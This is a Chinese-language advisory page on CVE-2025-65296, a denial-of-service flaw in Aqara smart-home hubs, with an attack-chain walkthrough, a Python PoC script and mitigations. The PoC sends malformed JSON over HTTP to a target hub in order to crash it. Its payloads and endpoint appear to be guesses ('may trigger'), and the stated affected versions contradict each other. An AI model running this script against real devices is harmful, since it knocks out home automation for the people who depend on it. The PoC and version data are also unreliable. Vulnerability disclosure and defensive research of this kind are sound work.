CVE-2025-65296-Aqara Hub JSON处理空指针解引用拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-65296

漏洞类型

空指针解引用

CVSS评分

6.5 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Aqara Hub M2, Aqara Hub M3, Aqara Camera Hub G3

漏洞概述

CVE-2025-65296是绿米联创（Aqara）旗下智能家居Hub设备中存在的安全漏洞。该漏洞影响三款主流Hub产品：Hub M2（固件版本4.3.6_0027）、Hub M3（固件版本4.3.6_0025）以及Camera Hub G3（固件版本4.1.9_0027）。漏洞根源在于这些设备的JSON数据处理模块存在空指针解引用缺陷。当攻击者向目标设备发送精心构造的畸形JSON数据时，设备在解析过程中会触发空指针解引用，导致进程异常终止或系统服务不可用。由于该漏洞位于Hub设备的核心通信模块，攻击成功后可造成整个智能家居系统的控制中枢瘫痪，影响与其连接的所有智能设备的正常运行。此外，由于攻击利用了JSON解析库的边界条件处理缺陷，攻击者无需获取任何认证凭据即可发起攻击，且无需用户交互配合，使得漏洞具有较高的可利用性。

技术细节

该漏洞属于典型的空指针解引用（NULL-pointer Dereference）漏洞。在C/C++等底层语言实现的JSON解析器中，当程序尝试访问空指针指向的内存地址时，会触发SIGSEGV（段错误）信号，导致进程崩溃。Aqara Hub设备在处理网络通信时，会对接收到的JSON数据进行解析。漏洞点出现在JSON解析器的字段提取逻辑中，当输入的JSON数据包含特定的字段组合或边界条件时，解析器在查找或复制字符串值时未能正确检查指针有效性，直接对NULL指针进行解引用操作。具体而言，攻击者构造的畸形JSON可能包含：空字符串值的字段、嵌套过深的JSON结构、或者触发解析器状态机异常的特定字符序列。由于Hub设备默认开放网络服务监听特定端口，攻击者可通过同一网络域内的任何设备发送恶意数据包，无需认证即可触发漏洞。成功利用后，Hub设备会失去响应能力，所有依赖该Hub的智能设备联动场景将失效。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先扫描网络，发现处于同一广播域内的Aqara Hub设备（M2/M3/G3），识别其IP地址和开放的网络端口

STEP 2

步骤2: 构造攻击载荷

攻击者构造包含特殊字符、空字符串值或异常JSON结构的畸形JSON数据，用于触发目标设备JSON解析器中的空指针解引用条件

STEP 3

步骤3: 发送恶意请求

通过HTTP或其他应用层协议向Hub设备的JSON处理接口发送畸形JSON数据，无需任何认证凭据

STEP 4

步骤4: 触发漏洞

Hub设备的JSON解析模块在处理恶意输入时，因未正确校验指针有效性而产生空指针解引用，导致进程崩溃

STEP 5

步骤5: 造成DoS效果

Hub设备失去响应能力，所有依赖该Hub的智能家居设备无法正常工作，联动场景失效，直至设备重启恢复

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-65296 PoC - Aqara Hub NULL-pointer Dereference DoS
# Author: Security Researcher
# Description: Send malformed JSON to trigger NULL-pointer dereference in Hub devices

import socket
import json
import sys

def send_malformed_json(target_ip, target_port=80):
    """Send malformed JSON payload to trigger vulnerability"""
    
    # Malformed JSON payloads that may trigger NULL-pointer dereference
    payloads = [
        # Payload 1: Empty string value causing NULL assignment
        json.dumps({"cmd": "", "data": None}),
        
        # Payload 2: Nested structure with special characters
        json.dumps({"cmd": "\x00\x00", "data": {"nested": ""}}),
        
        # Payload 3: Array with null elements
        json.dumps([None, "", {"key": None}]),
        
        # Payload 4: Deeply nested with empty values
        json.dumps({"level1": {"level2": {"level3": ""}}})
    ]
    
    for i, payload in enumerate(payloads):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(5)
            sock.connect((target_ip, target_port))
            
            # Send HTTP POST request with malformed JSON
            request = f"POST /api HTTP/1.1\r\n"
            request += f"Host: {target_ip}\r\n"
            request += f"Content-Type: application/json\r\n"
            request += f"Content-Length: {len(payload)}\r\n"
            request += f"\r\n{payload}"
            
            sock.send(request.encode())
            print(f"[+] Payload {i+1} sent: {payload[:50]}...")
            sock.close()
            
        except Exception as e:
            print(f"[-] Error sending payload {i+1}: {e}")
    
    print("[*] DoS packets sent. Check Hub device responsiveness.")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    send_malformed_json(target, port)

影响范围

Aqara Hub M2 < 4.3.6_0027

Aqara Hub M3 < 4.3.6_0025

Aqara Camera Hub G3 < 4.1.9_0027

防御指南

临时缓解措施

在厂商发布修复补丁前，可采取以下临时缓解措施：1）将Hub设备置于独立的网络分段，限制来自外部网络的访问；2）配置网络防火墙规则，仅允许受信任的设备IP地址与Hub通信；3）部署入侵检测系统监控异常的JSON数据包；4）定期检查Hub设备状态，发现异常时及时重启恢复服务；5）考虑暂时关闭Hub的非必要网络服务，减少攻击面。